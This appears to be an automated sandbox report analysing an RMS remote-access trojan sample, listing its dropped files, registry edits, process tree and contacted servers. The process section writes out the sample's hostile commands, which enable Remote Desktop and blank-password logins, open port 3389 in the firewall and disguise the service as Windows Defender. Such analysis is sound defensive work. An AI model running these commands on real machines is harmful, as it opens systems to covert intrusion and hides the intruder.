Malware Analysis Report

2024-11-30 19:53

Sample ID 220213-lrt7kaaeap
Target d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c
SHA256 d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c
Tags
rms evasion persistence rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c

Threat Level: Known bad

The file d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c was found to be: Known bad.

Malicious Activity Summary

rms evasion persistence rat trojan upx

RMS

Executes dropped EXE

Modifies Windows Firewall

UPX packed file

Sets DLL path for service in the registry

Allows Network login with blank passwords

Loads dropped DLL

Modifies WinLogon

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Runs .reg file with regedit

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: SetClipboardViewer

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-13 09:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-13 09:46

Reported

2022-02-13 09:49

Platform

win7-en-20211208

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

Signatures

RMS

trojan rat rms

Modifies Windows Firewall

evasion

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Allows Network login with blank passwords

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\limitblankpassworduse = "0" C:\Windows\SysWOW64\reg.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\Windows\RDPWInst.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\CardWindows\vp8decoder.dll C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\RDPWInst.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\RDPWInst.exe N/A
File created C:\Program Files\CardWindows\SystemDrvs.exe C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\regedit.reg C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\vp8encoder.dll C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\service.bat C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\sys.exe C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\MSIDrvs.exe C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RDPSetup.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPWInst.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.bat C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPCheck.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPConf.exe C:\Program Files\CardWindows\sys.exe N/A

Launches sc.exe

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Windows\RDPWInst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Windows\RDPWInst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Windows\RDPWInst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Windows\RDPWInst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Windows\RDPWInst.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\SystemDrvs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\RDPWInst.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1048 wrote to memory of 1072 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Program Files\CardWindows\\regedit.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "regedit.reg"

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /silentinstall

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /firewall

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /start

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\MSIDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Program Files\CardWindows\sys.exe

"C:\Program Files\CardWindows\\sys.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows/run.bat

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\Windows\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files\CardWindows\\service.bat""

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions=restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Windows_Defender v6.3"

Network

Country Destination Domain Proto
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

memory/1600-54-0x0000000075601000-0x0000000075603000-memory.dmp

C:\Program Files\CardWindows\regedit.reg

MD5 06c5938fae635bb8ce25794b720d792b
SHA1 bedbcddd59e5648543b53d0d66b643a2d26cb262
SHA256 bfd56a7929f620d054ae39a4815632934af9ce91810190ecc02c0381e61bdd5f
SHA512 befab3eddba41837c4e16000580e159934829a99827b03e382bea6a01cd5503a3f8b82746c0e9902b760dc8ab308dfa19fd7e8503d631acead4c9454c728d9fa

\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
